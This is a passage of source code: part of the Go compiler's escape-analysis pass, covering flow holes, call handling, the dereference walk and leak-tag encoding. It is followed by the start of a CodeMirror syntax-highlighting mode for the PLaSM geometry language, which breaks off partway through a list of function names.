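// conversion operand p flows to k via the OCONV case below, while the
// constant offset falls through to the default case and is discarded.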
func (e *Escape) unsafeValue(k EscHole, n *Node) {
if n.Type.Etype != TUINTPTR {
Fatalf("unexpected type %v for %v", n.Type, n)
}
e.stmts(n.Ninit)
switch n.Op {
case OCONV, OCONVNOP:
if n.Left.Type.IsUnsafePtr() {
e.expr(k, n.Left)
} else {
e.discard(n.Left)
}
case ODOTPTR:
if isReflectHeaderDataField(n) {
e.expr(k.deref(n, "reflect.Header.Data"), n.Left)
} else {
e.discard(n.Left)
}
case OPLUS, ONEG, OBITNOT:
e.unsafeValue(k, n.Left)
case OADD, OSUB, OOR, OXOR, OMUL, ODIV, OMOD, OAND, OANDNOT:
e.unsafeValue(k, n.Left)
e.unsafeValue(k, n.Right)
case OLSH, ORSH:
e.unsafeValue(k, n.Left)
// RHS need not be uintptr-typed (#32959) and can't meaningfully
// flow pointers anyway.
e.discard(n.Right)
default:
e.exprSkipInit(e.discardHole(), n)
}
}
// discard evaluates an expression n for side-effects, but discards
// its value.
func (e *Escape) discard(n *Node) {
e.expr(e.discardHole(), n)
}
func (e *Escape) discards(l Nodes) {
for _, n := range l.Slice() {
e.discard(n)
}
}
// addr evaluates an addressable expression n and returns an EscHole
// that represents storing into the represented location.
func (e *Escape) addr(n *Node) EscHole {
if n == nil || n.isBlank() {
// Can happen at least in OSELRECV.
// TODO(mdempsky): Anywhere else?
return e.discardHole()
}
k := e.heapHole()
switch n.Op {
default:
Fatalf("unexpected addr: %v", n)
case ONAME:
if n.Class() == PEXTERN {
break
}
k = e.oldLoc(n).asHole()
case ODOT:
k = e.addr(n.Left)
case OINDEX:
e.discard(n.Right)
if n.Left.Type.IsArray() {
k = e.addr(n.Left)
} else {
e.discard(n.Left)
}
case ODEREF, ODOTPTR:
e.discard(n)
case OINDEXMAP:
e.discard(n.Left)
e.assignHeap(n.Right, "key of map put", n)
}
if !n.Type.HasPointers() {
k = e.discardHole()
}
return k
}
func (e *Escape) addrs(l Nodes) []EscHole {
var ks []EscHole
for _, n := range l.Slice() {
ks = append(ks, e.addr(n))
}
return ks
}
// assign evaluates the assignment dst = src.
func (e *Escape) assign(dst, src *Node, why string, where *Node) {
// Filter out some no-op assignments for escape analysis.
ignore := dst != nil && src != nil && isSelfAssign(dst, src)
if ignore && Debug.m != 0 {
Warnl(where.Pos, "%v ignoring self-assignment in %S", funcSym(e.curfn), where)
}
k := e.addr(dst)
if dst != nil && dst.Op == ODOTPTR && isReflectHeaderDataField(dst) {
e.unsafeValue(e.heapHole().note(where, why), src)
} else {
if ignore {
k = e.discardHole()
}
e.expr(k.note(where, why), src)
}
}
func (e *Escape) assignHeap(src *Node, why string, where *Node) {
e.expr(e.heapHole().note(where, why), src)
}
// call evaluates a call expression, including builtin calls. ks
// should contain the holes representing where the function callee's
// results flow; where is the OGO/ODEFER context of the call, if any.
func (e *Escape) call(ks []EscHole, call, where *Node) {
topLevelDefer := where != nil && where.Op == ODEFER && e.loopDepth == 1
if topLevelDefer {
// force stack allocation of defer record, unless
// open-coded defers are used (see ssa.go)
where.Esc = EscNever
}
argument := func(k EscHole, arg *Node) {
if topLevelDefer {
			// Arguments to a top-level defer don't escape to
			// the heap, but they do need to last until the
			// end of the function.
k = e.later(k)
} else if where != nil {
k = e.heapHole()
}
e.expr(k.note(call, "call parameter"), arg)
}
switch call.Op {
default:
Fatalf("unexpected call op: %v", call.Op)
case OCALLFUNC, OCALLMETH, OCALLINTER:
fixVariadicCall(call)
// Pick out the function callee, if statically known.
var fn *Node
switch call.Op {
case OCALLFUNC:
switch v := staticValue(call.Left); {
case v.Op == ONAME && v.Class() == PFUNC:
fn = v
case v.Op == OCLOSURE:
fn = v.Func.Closure.Func.Nname
}
case OCALLMETH:
fn = asNode(call.Left.Type.FuncType().Nname)
}
fntype := call.Left.Type
if fn != nil {
fntype = fn.Type
}
if ks != nil && fn != nil && e.inMutualBatch(fn) {
for i, result := range fn.Type.Results().FieldSlice() {
e.expr(ks[i], asNode(result.Nname))
}
}
if r := fntype.Recv(); r != nil {
argument(e.tagHole(ks, fn, r), call.Left.Left)
} else {
// Evaluate callee function expression.
argument(e.discardHole(), call.Left)
}
args := call.List.Slice()
for i, param := range fntype.Params().FieldSlice() {
argument(e.tagHole(ks, fn, param), args[i])
}
case OAPPEND:
args := call.List.Slice()
// Appendee slice may flow directly to the result, if
// it has enough capacity. Alternatively, a new heap
// slice might be allocated, and all slice elements
// might flow to heap.
appendeeK := ks[0]
if args[0].Type.Elem().HasPointers() {
appendeeK = e.teeHole(appendeeK, e.heapHole().deref(call, "appendee slice"))
}
argument(appendeeK, args[0])
if call.IsDDD() {
appendedK := e.discardHole()
if args[1].Type.IsSlice() && args[1].Type.Elem().HasPointers() {
appendedK = e.heapHole().deref(call, "appended slice...")
}
argument(appendedK, args[1])
} else {
for _, arg := range args[1:] {
argument(e.heapHole(), arg)
}
}
case OCOPY:
argument(e.discardHole(), call.Left)
copiedK := e.discardHole()
if call.Right.Type.IsSlice() && call.Right.Type.Elem().HasPointers() {
copiedK = e.heapHole().deref(call, "copied slice")
}
argument(copiedK, call.Right)
case OPANIC:
argument(e.heapHole(), call.Left)
case OCOMPLEX:
argument(e.discardHole(), call.Left)
argument(e.discardHole(), call.Right)
case ODELETE, OPRINT, OPRINTN, ORECOVER:
for _, arg := range call.List.Slice() {
argument(e.discardHole(), arg)
}
case OLEN, OCAP, OREAL, OIMAG, OCLOSE:
argument(e.discardHole(), call.Left)
}
}
// tagHole returns a hole for evaluating an argument passed to param.
// ks should contain the holes representing where the function
// callee's results flow. fn is the statically-known callee function,
// if any.
func (e *Escape) tagHole(ks []EscHole, fn *Node, param *types.Field) EscHole {
// If this is a dynamic call, we can't rely on param.Note.
if fn == nil {
return e.heapHole()
}
if e.inMutualBatch(fn) {
return e.addr(asNode(param.Nname))
}
// Call to previously tagged function.
if param.Note == uintptrEscapesTag {
k := e.heapHole()
k.uintptrEscapesHack = true
return k
}
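	// For example (illustrative): a tag whose leak set records
	// Heap()==1 produces the single hole e.heapHole().shift(1): the
	// argument's pointed-to data escapes, but its own address does not.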
var tagKs []EscHole
esc := ParseLeaks(param.Note)
if x := esc.Heap(); x >= 0 {
tagKs = append(tagKs, e.heapHole().shift(x))
}
if ks != nil {
for i := 0; i < numEscResults; i++ {
if x := esc.Result(i); x >= 0 {
tagKs = append(tagKs, ks[i].shift(x))
}
}
}
return e.teeHole(tagKs...)
}
// inMutualBatch reports whether function fn is in the batch of
// mutually recursive functions being analyzed. When this is true,
// fn has not yet been analyzed, so its parameters and results
// should be incorporated directly into the flow graph instead of
// relying on its escape analysis tagging.
func (e *Escape) inMutualBatch(fn *Node) bool {
if fn.Name.Defn != nil && fn.Name.Defn.Esc < EscFuncTagged {
if fn.Name.Defn.Esc == EscFuncUnknown {
Fatalf("graph inconsistency")
}
return true
}
return false
}
// An EscHole represents a context for evaluating a Go
// expression. E.g., when evaluating p in "x = **p", we'd have a hole
// with dst==x and derefs==2.
type EscHole struct {
dst *EscLocation
derefs int // >= -1
notes *EscNote
// uintptrEscapesHack indicates this context is evaluating an
// argument for a //go:uintptrescapes function.
uintptrEscapesHack bool
}
type EscNote struct {
next *EscNote
where *Node
why string
}
func (k EscHole) note(where *Node, why string) EscHole {
if where == nil || why == "" {
Fatalf("note: missing where/why")
}
if Debug.m >= 2 || logopt.Enabled() {
k.notes = &EscNote{
next: k.notes,
where: where,
why: why,
}
}
return k
}
func (k EscHole) shift(delta int) EscHole {
k.derefs += delta
if k.derefs < -1 {
Fatalf("derefs underflow: %v", k.derefs)
}
return k
}
func (k EscHole) deref(where *Node, why string) EscHole { return k.shift(1).note(where, why) }
func (k EscHole) addr(where *Node, why string) EscHole { return k.shift(-1).note(where, why) }
func (k EscHole) dotType(t *types.Type, where *Node, why string) EscHole {
if !t.IsInterface() && !isdirectiface(t) {
k = k.shift(1)
}
return k.note(where, why)
}
// teeHole returns a new hole that flows into each hole of ks,
// similar to the Unix tee(1) command.
func (e *Escape) teeHole(ks ...EscHole) EscHole {
if len(ks) == 0 {
return e.discardHole()
}
if len(ks) == 1 {
return ks[0]
}
// TODO(mdempsky): Optimize if there's only one non-discard hole?
// Given holes "l1 = _", "l2 = **_", "l3 = *_", ..., create a
// new temporary location ltmp, wire it into place, and return
// a hole for "ltmp = _".
loc := e.newLoc(nil, true)
for _, k := range ks {
// N.B., "p = &q" and "p = &tmp; tmp = q" are not
// semantically equivalent. To combine holes like "l1
// = _" and "l2 = &_", we'd need to wire them as "l1 =
// *ltmp" and "l2 = ltmp" and return "ltmp = &_"
// instead.
if k.derefs < 0 {
Fatalf("teeHole: negative derefs")
}
e.flow(k, loc)
}
return loc.asHole()
}
func (e *Escape) dcl(n *Node) EscHole {
loc := e.oldLoc(n)
loc.loopDepth = e.loopDepth
return loc.asHole()
}
// spill allocates a new location associated with expression n, flows
// its address to k, and returns a hole that flows values to it. It's
// intended for use with most expressions that allocate storage.
func (e *Escape) spill(k EscHole, n *Node) EscHole {
loc := e.newLoc(n, true)
e.flow(k.addr(n, "spill"), loc)
return loc.asHole()
}
// later returns a new hole that flows into k, but some time later.
// Its main effect is to prevent immediate reuse of temporary
// variables introduced during Order.
func (e *Escape) later(k EscHole) EscHole {
loc := e.newLoc(nil, false)
e.flow(k, loc)
return loc.asHole()
}
// canonicalNode returns the canonical *Node that n logically
// represents.
func canonicalNode(n *Node) *Node {
if n != nil && n.Op == ONAME && n.Name.IsClosureVar() {
n = n.Name.Defn
if n.Name.IsClosureVar() {
Fatalf("still closure var")
}
}
return n
}
func (e *Escape) newLoc(n *Node, transient bool) *EscLocation {
if e.curfn == nil {
Fatalf("e.curfn isn't set")
}
if n != nil && n.Type != nil && n.Type.NotInHeap() {
yyerrorl(n.Pos, "%v is incomplete (or unallocatable); stack allocation disallowed", n.Type)
}
n = canonicalNode(n)
loc := &EscLocation{
n: n,
curfn: e.curfn,
loopDepth: e.loopDepth,
transient: transient,
}
e.allLocs = append(e.allLocs, loc)
if n != nil {
if n.Op == ONAME && n.Name.Curfn != e.curfn {
Fatalf("curfn mismatch: %v != %v", n.Name.Curfn, e.curfn)
}
if n.HasOpt() {
Fatalf("%v already has a location", n)
}
n.SetOpt(loc)
if why := heapAllocReason(n); why != "" {
e.flow(e.heapHole().addr(n, why), loc)
}
}
return loc
}
func (e *Escape) oldLoc(n *Node) *EscLocation {
n = canonicalNode(n)
return n.Opt().(*EscLocation)
}
func (l *EscLocation) asHole() EscHole {
return EscHole{dst: l}
}
func (e *Escape) flow(k EscHole, src *EscLocation) {
dst := k.dst
if dst == &e.blankLoc {
return
}
if dst == src && k.derefs >= 0 { // dst = dst, dst = *dst, ...
return
}
if dst.escapes && k.derefs < 0 { // dst = &src
if Debug.m >= 2 || logopt.Enabled() {
pos := linestr(src.n.Pos)
if Debug.m >= 2 {
fmt.Printf("%s: %v escapes to heap:\n", pos, src.n)
}
explanation := e.explainFlow(pos, dst, src, k.derefs, k.notes, []*logopt.LoggedOpt{})
if logopt.Enabled() {
logopt.LogOpt(src.n.Pos, "escapes", "escape", e.curfn.funcname(), fmt.Sprintf("%v escapes to heap", src.n), explanation)
}
}
src.escapes = true
return
}
// TODO(mdempsky): Deduplicate edges?
dst.edges = append(dst.edges, EscEdge{src: src, derefs: k.derefs, notes: k.notes})
}
func (e *Escape) heapHole() EscHole { return e.heapLoc.asHole() }
func (e *Escape) discardHole() EscHole { return e.blankLoc.asHole() }
// walkAll computes the minimal dereferences between all pairs of
// locations.
func (e *Escape) walkAll() {
// We use a work queue to keep track of locations that we need
// to visit, and repeatedly walk until we reach a fixed point.
//
// We walk once from each location (including the heap), and
// then re-enqueue each location on its transition from
// transient->!transient and !escapes->escapes, which can each
// happen at most once. So we take Θ(len(e.allLocs)) walks.
	// todo is a LIFO queue; it has enough room for e.allLocs and e.heapLoc.
todo := make([]*EscLocation, 0, len(e.allLocs)+1)
enqueue := func(loc *EscLocation) {
if !loc.queued {
todo = append(todo, loc)
loc.queued = true
}
}
for _, loc := range e.allLocs {
enqueue(loc)
}
enqueue(&e.heapLoc)
var walkgen uint32
for len(todo) > 0 {
root := todo[len(todo)-1]
todo = todo[:len(todo)-1]
root.queued = false
walkgen++
e.walkOne(root, walkgen, enqueue)
}
}
// walkOne computes the minimal number of dereferences from root to
// all other locations.
func (e *Escape) walkOne(root *EscLocation, walkgen uint32, enqueue func(*EscLocation)) {
// The data flow graph has negative edges (from addressing
// operations), so we use the Bellman-Ford algorithm. However,
// we don't have to worry about infinite negative cycles since
// we bound intermediate dereference counts to 0.
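	//
	// For example (illustrative): mutual assignments "p = &q; q = &p"
	// form a cycle of derefs -1 edges; clamping the intermediate count
	// at 0 below keeps the relaxation from decreasing forever.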
root.walkgen = walkgen
root.derefs = 0
root.dst = nil
todo := []*EscLocation{root} // LIFO queue
for len(todo) > 0 {
l := todo[len(todo)-1]
todo = todo[:len(todo)-1]
base := l.derefs
// If l.derefs < 0, then l's address flows to root.
addressOf := base < 0
if addressOf {
// For a flow path like "root = &l; l = x",
// l's address flows to root, but x's does
// not. We recognize this by lower bounding
// base at 0.
base = 0
// If l's address flows to a non-transient
// location, then l can't be transiently
// allocated.
if !root.transient && l.transient {
l.transient = false
enqueue(l)
}
}
if e.outlives(root, l) {
// l's value flows to root. If l is a function
// parameter and root is the heap or a
// corresponding result parameter, then record
// that value flow for tagging the function
// later.
if l.isName(PPARAM) {
if (logopt.Enabled() || Debug.m >= 2) && !l.escapes {
if Debug.m >= 2 {
fmt.Printf("%s: parameter %v leaks to %s with derefs=%d:\n", linestr(l.n.Pos), l.n, e.explainLoc(root), base)
}
explanation := e.explainPath(root, l)
if logopt.Enabled() {
logopt.LogOpt(l.n.Pos, "leak", "escape", e.curfn.funcname(),
fmt.Sprintf("parameter %v leaks to %s with derefs=%d", l.n, e.explainLoc(root), base), explanation)
}
}
l.leakTo(root, base)
}
// If l's address flows somewhere that
// outlives it, then l needs to be heap
// allocated.
if addressOf && !l.escapes {
if logopt.Enabled() || Debug.m >= 2 {
if Debug.m >= 2 {
fmt.Printf("%s: %v escapes to heap:\n", linestr(l.n.Pos), l.n)
}
explanation := e.explainPath(root, l)
if logopt.Enabled() {
logopt.LogOpt(l.n.Pos, "escape", "escape", e.curfn.funcname(), fmt.Sprintf("%v escapes to heap", l.n), explanation)
}
}
l.escapes = true
enqueue(l)
continue
}
}
for i, edge := range l.edges {
if edge.src.escapes {
continue
}
derefs := base + edge.derefs
if edge.src.walkgen != walkgen || edge.src.derefs > derefs {
edge.src.walkgen = walkgen
edge.src.derefs = derefs
edge.src.dst = l
edge.src.dstEdgeIdx = i
todo = append(todo, edge.src)
}
}
}
}
// explainPath prints an explanation of how src flows to the walk root.
func (e *Escape) explainPath(root, src *EscLocation) []*logopt.LoggedOpt {
visited := make(map[*EscLocation]bool)
pos := linestr(src.n.Pos)
var explanation []*logopt.LoggedOpt
for {
// Prevent infinite loop.
if visited[src] {
if Debug.m >= 2 {
fmt.Printf("%s: warning: truncated explanation due to assignment cycle; see golang.org/issue/35518\n", pos)
}
break
}
visited[src] = true
dst := src.dst
edge := &dst.edges[src.dstEdgeIdx]
if edge.src != src {
Fatalf("path inconsistency: %v != %v", edge.src, src)
}
explanation = e.explainFlow(pos, dst, src, edge.derefs, edge.notes, explanation)
if dst == root {
break
}
src = dst
}
return explanation
}
func (e *Escape) explainFlow(pos string, dst, srcloc *EscLocation, derefs int, notes *EscNote, explanation []*logopt.LoggedOpt) []*logopt.LoggedOpt {
ops := "&"
if derefs >= 0 {
ops = strings.Repeat("*", derefs)
}
print := Debug.m >= 2
flow := fmt.Sprintf(" flow: %s = %s%v:", e.explainLoc(dst), ops, e.explainLoc(srcloc))
if print {
fmt.Printf("%s:%s\n", pos, flow)
}
if logopt.Enabled() {
var epos src.XPos
if notes != nil {
epos = notes.where.Pos
} else if srcloc != nil && srcloc.n != nil {
epos = srcloc.n.Pos
}
explanation = append(explanation, logopt.NewLoggedOpt(epos, "escflow", "escape", e.curfn.funcname(), flow))
}
for note := notes; note != nil; note = note.next {
if print {
fmt.Printf("%s: from %v (%v) at %s\n", pos, note.where, note.why, linestr(note.where.Pos))
}
if logopt.Enabled() {
explanation = append(explanation, logopt.NewLoggedOpt(note.where.Pos, "escflow", "escape", e.curfn.funcname(),
fmt.Sprintf(" from %v (%v)", note.where, note.why)))
}
}
return explanation
}
func (e *Escape) explainLoc(l *EscLocation) string {
if l == &e.heapLoc {
return "{heap}"
}
if l.n == nil {
// TODO(mdempsky): Omit entirely.
return "{temp}"
}
if l.n.Op == ONAME {
return fmt.Sprintf("%v", l.n)
}
return fmt.Sprintf("{storage for %v}", l.n)
}
// outlives reports whether values stored in l may survive beyond
// other's lifetime if stack allocated.
func (e *Escape) outlives(l, other *EscLocation) bool {
// The heap outlives everything.
if l.escapes {
return true
}
// We don't know what callers do with returned values, so
// pessimistically we need to assume they flow to the heap and
// outlive everything too.
if l.isName(PPARAMOUT) {
// Exception: Directly called closures can return
// locations allocated outside of them without forcing
// them to the heap. For example:
//
// var u int // okay to stack allocate
// *(func() *int { return &u }()) = 42
if containsClosure(other.curfn, l.curfn) && l.curfn.Func.Closure.Func.Top&ctxCallee != 0 {
return false
}
return true
}
// If l and other are within the same function, then l
// outlives other if it was declared outside other's loop
// scope. For example:
//
// var l *int
// for {
// l = new(int)
// }
if l.curfn == other.curfn && l.loopDepth < other.loopDepth {
return true
}
// If other is declared within a child closure of where l is
// declared, then l outlives it. For example:
//
// var l *int
// func() {
// l = new(int)
// }
if containsClosure(l.curfn, other.curfn) {
return true
}
return false
}
// containsClosure reports whether c is a closure contained within f.
func containsClosure(f, c *Node) bool {
if f.Op != ODCLFUNC || c.Op != ODCLFUNC {
Fatalf("bad containsClosure: %v, %v", f, c)
}
// Common case.
if f == c {
return false
}
// Closures within function Foo are named like "Foo.funcN..."
// TODO(mdempsky): Better way to recognize this.
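	// For example (illustrative): with f named "Foo" and c named
	// "Foo.func1", the prefix-plus-'.' check below matches, while an
	// unrelated "Foobar" does not.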
fn := f.Func.Nname.Sym.Name
cn := c.Func.Nname.Sym.Name
return len(cn) > len(fn) && cn[:len(fn)] == fn && cn[len(fn)] == '.'
}
// leakTo records that parameter l leaks to sink.
func (l *EscLocation) leakTo(sink *EscLocation, derefs int) {
// If sink is a result parameter that doesn't escape (#44614)
// and we can fit return bits into the escape analysis tag,
// then record as a result leak.
if !sink.escapes && sink.isName(PPARAMOUT) && sink.curfn == l.curfn {
// TODO(mdempsky): Eliminate dependency on Vargen here.
ri := int(sink.n.Name.Vargen) - 1
if ri < numEscResults {
// Leak to result parameter.
l.paramEsc.AddResult(ri, derefs)
return
}
}
// Otherwise, record as heap leak.
l.paramEsc.AddHeap(derefs)
}
func (e *Escape) finish(fns []*Node) {
// Record parameter tags for package export data.
for _, fn := range fns {
fn.Esc = EscFuncTagged
narg := 0
for _, fs := range &types.RecvsParams {
for _, f := range fs(fn.Type).Fields().Slice() {
narg++
f.Note = e.paramTag(fn, narg, f)
}
}
}
for _, loc := range e.allLocs {
n := loc.n
if n == nil {
continue
}
n.SetOpt(nil)
// Update n.Esc based on escape analysis results.
if loc.escapes {
if n.Op != ONAME {
if Debug.m != 0 {
Warnl(n.Pos, "%S escapes to heap", n)
}
if logopt.Enabled() {
logopt.LogOpt(n.Pos, "escape", "escape", e.curfn.funcname())
}
}
n.Esc = EscHeap
addrescapes(n)
} else {
if Debug.m != 0 && n.Op != ONAME {
Warnl(n.Pos, "%S does not escape", n)
}
n.Esc = EscNone
if loc.transient {
n.SetTransient(true)
}
}
}
}
func (l *EscLocation) isName(c Class) bool {
return l.n != nil && l.n.Op == ONAME && l.n.Class() == c
}
const numEscResults = 7
// An EscLeaks represents a set of assignment flows from a parameter
// to the heap or to any of its function's (first numEscResults)
// result parameters.
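//
// Each element stores a deref count biased by +1, with 0 meaning "no
// flow"; e.g. (illustrative) AddHeap(0) stores 1 in l[0], so Heap()
// then reports 0.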
type EscLeaks [1 + numEscResults]uint8
// Empty reports whether l is an empty set (i.e., no assignment flows).
func (l EscLeaks) Empty() bool { return l == EscLeaks{} }
// Heap returns the minimum deref count of any assignment flow from l
// to the heap. If no such flows exist, Heap returns -1.
func (l EscLeaks) Heap() int { return l.get(0) }
// Result returns the minimum deref count of any assignment flow from
// l to its function's i'th result parameter. If no such flows exist,
// Result returns -1.
func (l EscLeaks) Result(i int) int { return l.get(1 + i) }
// AddHeap adds an assignment flow from l to the heap.
func (l *EscLeaks) AddHeap(derefs int) { l.add(0, derefs) }
// AddResult adds an assignment flow from l to its function's i'th
// result parameter.
func (l *EscLeaks) AddResult(i, derefs int) { l.add(1+i, derefs) }
func (l *EscLeaks) setResult(i, derefs int) { l.set(1+i, derefs) }
func (l EscLeaks) get(i int) int { return int(l[i]) - 1 }
func (l *EscLeaks) add(i, derefs int) {
if old := l.get(i); old < 0 || derefs < old {
l.set(i, derefs)
}
}
func (l *EscLeaks) set(i, derefs int) {
v := derefs + 1
if v < 0 {
Fatalf("invalid derefs count: %v", derefs)
}
if v > math.MaxUint8 {
v = math.MaxUint8
}
l[i] = uint8(v)
}
// Optimize removes result flow paths that are equal in length or
// longer than the shortest heap flow path.
func (l *EscLeaks) Optimize() {
// If we have a path to the heap, then there's no use in
// keeping equal or longer paths elsewhere.
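	// For example (illustrative): with Heap()==1, a result leak
	// recorded at derefs 2 is redundant and is cleared below.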
if x := l.Heap(); x >= 0 {
for i := 0; i < numEscResults; i++ {
if l.Result(i) >= x {
l.setResult(i, -1)
}
}
}
}
var leakTagCache = map[EscLeaks]string{}
// Encode converts l into a binary string for export data.
func (l EscLeaks) Encode() string {
if l.Heap() == 0 {
// Space optimization: empty string encodes more
// efficiently in export data.
return ""
}
if s, ok := leakTagCache[l]; ok {
return s
}
n := len(l)
for n > 0 && l[n-1] == 0 {
n--
}
s := "esc:" + string(l[:n])
leakTagCache[l] = s
return s
}
// ParseLeaks parses a binary string representing an EscLeaks.
func ParseLeaks(s string) EscLeaks {
var l EscLeaks
if !strings.HasPrefix(s, "esc:") {
l.AddHeap(0)
return l
}
copy(l[:], s[4:])
return l
}
plasm.js
CodeMirror.defineMode("plasm", function(conf, parserConf) {
var ERRORCLASS = 'error';
function wordRegexp(words) {
return new RegExp("^((" + words.join(")|(") + "))\\b");
}
var singleOperators = new RegExp("^[\\+\\-\\*/%&|\\^~<>!]");
var singleDelimiters = new RegExp('^[\\(\\)\\[\\]\\{\\}@,:`=;\\.]');
var doubleOperators = new RegExp("^((==)|(!=)|(<=)|(>=)|(<>)|(<<)|(>>)|(//)|(\\*\\*))");
var doubleDelimiters = new RegExp("^((\\+=)|(\\-=)|(\\*=)|(%=)|(/=)|(&=)|(\\|=)|(\\^=))");
var tripleDelimiters = new RegExp("^((//=)|(>>=)|(<<=)|(\\*\\*=))");
var identifiers = new RegExp("^[_A-Za-z][_A-Za-z0-9]*");
var assignOperators = new RegExp("^\\W*((=)|(\\+=)|(-=)|(/=)|(\\*=))");
var funcIdentifiers = new RegExp("^[_A-Z][_A-Z0-9]*$");
var wordOperators = wordRegexp(['and', 'or', 'not', 'is', 'in']);
var commonkeywords = ['as', 'assert', 'break', 'class', 'continue',
'def', 'del', 'elif', 'else', 'except', 'finally',
'for', 'from', 'global', 'if', 'import',
'lambda', 'pass', 'raise', 'return',
'try', 'while', 'with', 'yield'];
var commonBuiltins = ['abs', 'all', 'any', 'bin', 'bool', 'bytearray', 'callable', 'chr',
'classmethod', 'compile', 'complex', 'delattr', 'dict', 'dir', 'divmod',
'enumerate', 'eval', 'filter', 'float', 'format', 'frozenset',
'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id',
'input', 'int', 'isinstance', 'issubclass', 'iter', 'len',
'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next',
'object', 'oct', 'open', 'ord', 'pow', 'property', 'range',
'repr', 'reversed', 'round', 'set', 'setattr', 'slice',
'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple',
'type', 'vars', 'zip', '__import__', 'NotImplemented',
'Ellipsis', '__debug__'];
var customGroups = [
[
'CUBE', 'SQUARE', 'SQUARE3D', 'BOX', 'BRICK', 'RECTANGLE', 'RECTANGLE3D', 'HEXAHEDRON', 'SIMPLEX', 'CHULL', 'INTERVALS', 'RING', 'TUBE', 'RING3D', 'CIRCLE', 'CIRCLE3D', 'ELLIPSE', 'ARC', 'ARC3D', 'CYLINDER', 'CYL', 'SPHERE', 'TORUS', 'DONUT', 'ELBOW', 'CONE', 'PYRAMID', 'TCONE', 'TRUNCONE', 'DODECAHEDRON', 'ICOSAHEDRON', 'TETRAHEDRON', 'TRIANGLE', 'TRIANGLE3D', 'QUAD', 'QUADRILATERAL', 'BEZIER1', 'BEZIER2', 'BEZIER3', 'COONSPATCH', 'RULEDSURFACE', 'PROFILEPRODSURFACE', 'ROTATIONALSURFACE', 'ROSURFACE', 'ROSURF', 'ROTATIONALSOLID', 'ROSOLID', 'ROSOL', 'ROTATIONALSHELL', 'ROSHELL', 'CYLINDRICALSURFACE', 'CYSURFACE', 'CYSURF', 'CONICALSURFACE', 'COSURFACE', 'COSURF', 'CUBICHERMITE1', 'CUBICHERMITE2', 'CUBICHERMITE3', 'STAR', 'PRISM', 'REFDOMAIN', 'REFDOMAIN3D', 'UNITSQUARE', 'UNITCUBE', 'TANGRAM1', 'TANGRAM2', 'TANGRAM3', 'TANGRAM4', 'TANGRAM5', 'TANGRAM6', 'TANGRAM7', 'POINT', 'SHELL', 'OCTAHEDRON', 'KRYCHLE', 'KOSTKA', 'SZESCIAN', 'WUERFEL', 'WURFEL', 'CUBO', 'CTVEREC', 'KWADRAT', 'QUADRAT', 'CUADRADO', 'QUADRATO', 'CARRE', 'KVADR', 'CIHLA', 'PUDLO', 'CEGLA', 'KASTEN', 'SCHACHTEL', 'LADRILLO', 'CAJA', 'CUADRO', 'COTTO', 'SCATOLA', 'MATTONE', 'LATERIZIO', 'PARALELLEPIPEDO', 'BRIQUE', 'BOITE', 'RECT', 'OBDELNIK', 'PROSTOKAT', 'RECHTECK', 'RECTANGULO', 'RETTANGOLO', 'HEX', 'HEXAEDR', 'HEXAEDER', 'HEXAEDRO', 'ESAEDRO', 'HEXAEDRE', 'CONVEXHULL', 'CONVEX', 'CH', 'SPAN', 'KONVEXNIOBAL', 'KONVEX', 'OBAL', 'KOBAL', 'OTOCZKAWYPUKLA', 'OTOCZKA', 'HUELLE', 'HULLE', 'SPANNE', 'CASCO', 'CONVEXA', 'CONVESSO', 'SPANNA', 'CONVEXE', 'ENVELOPPE', 'DUREE', 'DIVISION', 'DELENI', 'INTERVALY', 'DZIELENIE', 'INTERWALY', 'INTERVALLE', 'AUFTEILEN', 'AUFSPALTEN', 'DIVISIONE', 'TRUBICE', 'TRUBKA', 'TUBA', 'ROURA', 'RURA', 'ROHR', 'TUBO', 'KRUH', 'KRUZNICE', 'KOLO', 'KRAG', 'OKRAG', 'KREIS', 'CIRCULO', 'CERCHIO', 'CERCLE', 'ROND', 'VALEC', 'ZYLINDER', 'ZYL', 'CILINDRO', 'CIL', 'CYLINDRE', 'KOULE', 'KULA', 'SFERA', 'KUGEL', 'ESFERA', 'TORO', 'TORE', 'KUZEL', 'STOZEK', 'KEGEL', 'CONO', 'KOMOLYKUZEL', 'KKUZEL', 'SCIETYSTOZEK', 'SSTOZEK', 'KEGELSTUMPF', 'KSTUMPF', 'CONOTRUNCADO', 'TRUNCONO', 'TCONO', 'TRONCONO', 'TRONCONE', 'DODEKAEDR', 'DVANACTISTEN', 'DWUNASTOSCIAN', 'DODEKAEDER', 'DODECAEDRO', 'DODECAEDRE', 'IKOSAEDR', 'DVACETISTEN', 'DWUDZIESTOSCIAN', 'IKOSAEDER', 'ICOSAEDRO', 'ICOSAEDRE', 'TET', 'TETRAEDR', 'CTYRSTEN', 'CZWOROBOK', 'CZWOROSCIAN', 'TETRAEDER', 'TETRAEDRO', 'TETRAEDRE', 'TROJUHELNIK', 'TROJKAT', 'DREIECK', 'TRIANGULO', 'TRIANGOLO', 'RUSURFACE', 'RUSURF', 'RUSU', 'PPSURFACE', 'PPSURF', 'PPSU', 'ROSU', 'ROTSOLID', 'ROTSHELL', 'CYSU', 'COSU', 'HRANOL', 'PRYZMA', 'PRYZMAT', 'PRISMA', 'PRISME', 'OKTAEDR', 'OCTAEDER', 'OCTAEDRO', 'EMPTY', 'EMPTYLIST'
],
[
